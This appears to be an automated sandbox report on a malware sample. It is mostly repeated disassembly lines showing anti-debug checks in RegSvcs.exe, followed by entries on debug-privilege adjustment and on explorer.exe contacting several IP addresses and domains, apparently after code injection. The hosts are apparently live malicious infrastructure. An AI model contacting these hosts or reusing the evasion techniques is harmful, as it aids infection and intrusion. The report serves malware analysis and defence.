Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB8A0A mov eax, dword ptr fs:[00000030h] 3_2_00FB8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h] 3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h] 3_2_0106AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCDBE9 mov eax, dword ptr fs:[00000030h] 3_2_00FCDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h] 3_2_00FD03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h] 3_2_00FD4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106EA55 mov eax, dword ptr fs:[00000030h] 3_2_0106EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01034257 mov eax, dword ptr fs:[00000030h] 3_2_01034257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h] 3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h] 3_2_0105B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078A62 mov eax, dword ptr fs:[00000030h] 3_2_01078A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2397 mov eax, dword ptr fs:[00000030h] 3_2_00FD2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDB390 mov eax, dword ptr fs:[00000030h] 3_2_00FDB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h] 3_2_00FB1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h] 3_2_00FD3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FADB60 mov ecx, dword ptr fs:[00000030h] 3_2_00FADB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAF358 mov eax, dword ptr fs:[00000030h] 3_2_00FAF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FADB40 mov eax, dword ptr fs:[00000030h] 3_2_00FADB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078D34 mov eax, dword ptr fs:[00000030h] 3_2_01078D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0102A537 mov eax, dword ptr fs:[00000030h] 3_2_0102A537
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106E539 mov eax, dword ptr fs:[00000030h] 3_2_0106E539
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01023540 mov eax, dword ptr fs:[00000030h] 3_2_01023540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01053D40 mov eax, dword ptr fs:[00000030h] 3_2_01053D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB849B mov eax, dword ptr fs:[00000030h] 3_2_00FB849B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC746D mov eax, dword ptr fs:[00000030h] 3_2_00FC746D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h] 3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010705AC mov eax, dword ptr fs:[00000030h] 3_2_010705AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA44B mov eax, dword ptr fs:[00000030h] 3_2_00FDA44B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov ecx, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h] 3_2_01026DC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDBC2C mov eax, dword ptr fs:[00000030h] 3_2_00FDBC2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h] 3_2_0106FDE2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01058DF1 mov eax, dword ptr fs:[00000030h] 3_2_01058DF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h] 3_2_01061C06
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h] 3_2_01026C0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107740D mov eax, dword ptr fs:[00000030h] 3_2_0107740D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h] 3_2_00FBD5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h] 3_2_00FD1DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h] 3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h] 3_2_0103C450
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD35A1 mov eax, dword ptr fs:[00000030h] 3_2_00FD35A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h] 3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h] 3_2_00FDFD9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h] 3_2_00FA2D8A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h] 3_2_00FD2581
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h] 3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h] 3_2_00FCC577
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FC7D50 mov eax, dword ptr fs:[00000030h] 3_2_00FC7D50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE3D43 mov eax, dword ptr fs:[00000030h] 3_2_00FE3D43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h] 3_2_00FD4D3B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAAD30 mov eax, dword ptr fs:[00000030h] 3_2_00FAAD30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h] 3_2_00FB3D34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078CD6 mov eax, dword ptr fs:[00000030h] 3_2_01078CD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h] 3_2_01026CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010614FB mov eax, dword ptr fs:[00000030h] 3_2_010614FB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h] 3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0107070D mov eax, dword ptr fs:[00000030h] 3_2_0107070D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h] 3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h] 3_2_0103FF10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB76E2 mov eax, dword ptr fs:[00000030h] 3_2_00FB76E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD16E0 mov ecx, dword ptr fs:[00000030h] 3_2_00FD16E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD36CC mov eax, dword ptr fs:[00000030h] 3_2_00FD36CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE8EC7 mov eax, dword ptr fs:[00000030h] 3_2_00FE8EC7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078F6A mov eax, dword ptr fs:[00000030h] 3_2_01078F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h] 3_2_00FCAE73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB766D mov eax, dword ptr fs:[00000030h] 3_2_00FB766D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01027794 mov eax, dword ptr fs:[00000030h] 3_2_01027794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h] 3_2_00FB7E41
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAE620 mov eax, dword ptr fs:[00000030h] 3_2_00FAE620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h] 3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h] 3_2_00FDA61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h] 3_2_00FAC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FD8E00 mov eax, dword ptr fs:[00000030h] 3_2_00FD8E00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FE37F5 mov eax, dword ptr fs:[00000030h] 3_2_00FE37F5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01061608 mov eax, dword ptr fs:[00000030h] 3_2_01061608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FE3F mov eax, dword ptr fs:[00000030h] 3_2_0105FE3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h] 3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h] 3_2_0106AE44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FB8794 mov eax, dword ptr fs:[00000030h] 3_2_00FB8794
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0103FE87 mov eax, dword ptr fs:[00000030h] 3_2_0103FE87
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBFF60 mov eax, dword ptr fs:[00000030h] 3_2_00FBFF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h] 3_2_01070EA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_010246A7 mov eax, dword ptr fs:[00000030h] 3_2_010246A7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FBEF40 mov eax, dword ptr fs:[00000030h] 3_2_00FBEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_0105FEC0 mov eax, dword ptr fs:[00000030h] 3_2_0105FEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDE730 mov eax, dword ptr fs:[00000030h] 3_2_00FDE730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_01078ED6 mov eax, dword ptr fs:[00000030h] 3_2_01078ED6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h] 3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h] 3_2_00FA4F2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FCF716 mov eax, dword ptr fs:[00000030h] 3_2_00FCF716
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h] 3_2_00FDA70E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h] 3_2_00FDA70E
Enables debug privileges
Source: C:\Users\user\Desktop\00098765123POIIU.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\00098765123POIIU.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.217 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.maraitime.com
Source: C:\Windows\explorer.exe Network Connect: 199.192.23.253 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 173.236.152.151 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.ihdeuruim.com
Source: C:\Windows\explorer.exe Domain query: www.embraceblm.com
Source: C:\Windows\explorer.exe Domain query: www.ytksw.com
Source: C:\Windows\explorer.exe Network Connect: 172.217.168.83 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.soccer-yokouchi.club
Source: C:\Windows\explorer.exe Domain query: www.helenafinaltouch.com
Source: C:\Windows\explorer.exe Network Connect: 45.39.20.158 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.contorig2.com
Source: C:\Windows\explorer.exe Network Connect: 160.153.132.205 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.bogolacke.com
